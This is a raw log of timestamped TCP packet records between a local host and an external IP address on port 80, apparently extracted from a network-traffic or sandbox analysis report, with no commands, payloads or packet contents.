Dec 19, 2024 10:10:13.504071951 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.504113913 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.504297972 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.504342079 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.505198956 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.505242109 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.505285025 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.505325079 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.506124973 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.509979963 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.644406080 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.644431114 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.644450903 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.644479036 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.644500017 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.644534111 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.644901037 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.645313978 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.645364046 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.645454884 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.645528078 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.646269083 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.646382093 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.646428108 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.646472931 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.647346973 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.647403002 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.647516966 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.647564888 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.648247004 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.648374081 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.648421049 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.649363041 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.649468899 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.649513960 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.650403023 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.650432110 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.650482893 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.651242971 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.651294947 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.651349068 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.651452065 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.652229071 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.652280092 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.652374983 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.652415991 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.653224945 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.653275967 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.653321981 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.653362036 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.654216051 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.654243946 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.654284954 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.655275106 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.655374050 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.655421019 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.656207085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.656251907 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.656302929 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.657210112 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.657253981 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.657346010 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.657968044 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.658206940 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.658329010 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.658370972 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.659190893 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.659360886 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.659406900 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.660166025 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.660212040 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.660257101 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.661194086 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.661237955 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.661283970 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.661947012 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.662242889 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.662327051 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.662369967 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.663269997 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.663506031 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.663549900 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.664197922 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.664242029 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.664269924 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.665174007 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.665226936 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.665231943 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.665946007 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.666156054 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.666332960 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.666374922 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.667152882 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.667181969 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.667227983 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.668204069 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.668320894 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.668337107 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.669234037 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.669281960 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.669327974 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.669953108 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.670151949 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.670263052 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.670312881 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.671164989 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.671256065 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.671319008 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.672167063 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.672221899 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.672243118 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.673182964 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.673235893 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.673238039 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.673969984 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.674117088 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.674220085 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.674264908 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.675183058 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.675276041 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.675327063 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.676100969 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.676177979 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.676229954 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.677136898 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.677265882 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.677314043 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.678117990 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.678235054 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.678287029 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.679116011 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.679171085 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.679187059 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.680135012 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.680187941 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.680191040 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.681096077 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.681199074 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.681246042 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.681982040 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.682185888 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.682270050 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.682398081 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.683089972 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.683116913 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.683151960 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.683166027 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.684134007 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.684160948 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.684187889 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.684201956 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.685343027 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.685369968 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.685394049 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.685408115 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.686326981 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.686382055 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.686387062 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.686425924 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.687303066 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.687356949 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.687357903 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.687400103 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.688194990 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.688245058 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.688250065 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.688288927 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.689174891 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.689224958 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.689274073 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.689316034 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.690145016 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.690195084 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.690246105 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.690288067 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.691121101 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.691174030 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.691287994 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.691332102 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.692174911 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.692229033 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.692368984 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.692418098 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.693180084 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.693232059 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.693331003 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.693377018 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.694112062 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.694168091 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.694211960 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.694255114 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.695329905 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.695379972 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.695430040 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.695472956 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.696417093 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.696461916 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.836654902 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.836869001 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.836898088 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.836919069 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.836955070 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.836975098 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.837007046 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.837807894 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.837867975 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.838157892 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.838255882 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.839179039 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.839319944 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.839376926 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.839395046 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.839426994 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.839442015 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.840244055 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.840301037 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.840311050 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.840511084 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.841171980 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.841231108 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.841461897 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.841640949 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.842180967 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.842233896 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.842823029 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.842878103 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.843271971 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.843290091 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.843326092 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.843343973 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.844613075 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.844666958 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.845537901 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.845601082 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.845957994 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.846007109 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.846168041 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.846286058 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.847070932 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.847121000 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.847476006 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.847570896 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.848128080 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.848241091 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.848407030 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.848479033 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.849104881 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.849153042 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.850091934 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.850111008 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.850142956 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.850156069 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.850187063 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.850231886 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.850956917 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.851032019 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.851258993 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.851310015 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.851968050 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.852015018 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.852086067 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.852129936 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.852792978 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.852845907 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.853197098 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.853256941 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.853513956 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.853570938 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.853918076 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.854121923 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.854168892 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.854171038 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.854770899 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.855103970 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.855160952 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.855206966 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.855292082 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.856123924 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.856170893 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.856518984 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.856566906 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.857139111 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.857156992 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.857207060 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.858102083 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.858511925 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.858566046 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.859078884 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.859127998 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.859216928 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.860084057 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.860135078 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.860377073 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.861088991 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.861140013 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.861177921 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.861222982 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.862135887 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.862183094 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.862272024 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.862494946 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.863076925 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.863135099 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.863137007 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.863229036 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.864053965 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.864104986 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.864221096 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.864276886 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.865053892 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.865206957 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.865282059 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.865431070 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.866059065 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.866108894 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.866390944 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.866487980 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.867028952 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.867080927 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.867225885 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.867295980 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.868026018 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.868130922 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.868515015 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.868561983 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.869030952 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.869193077 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.869329929 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.869374037 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.870166063 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.870224953 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.870621920 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.870682001 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.870997906 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.871201992 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.871519089 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.871582985 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.872003078 CET	80	49860	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:13.872054100 CET	49860	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:13.872270107 CET	80	49860	185.215.113.16	192.168.2.6
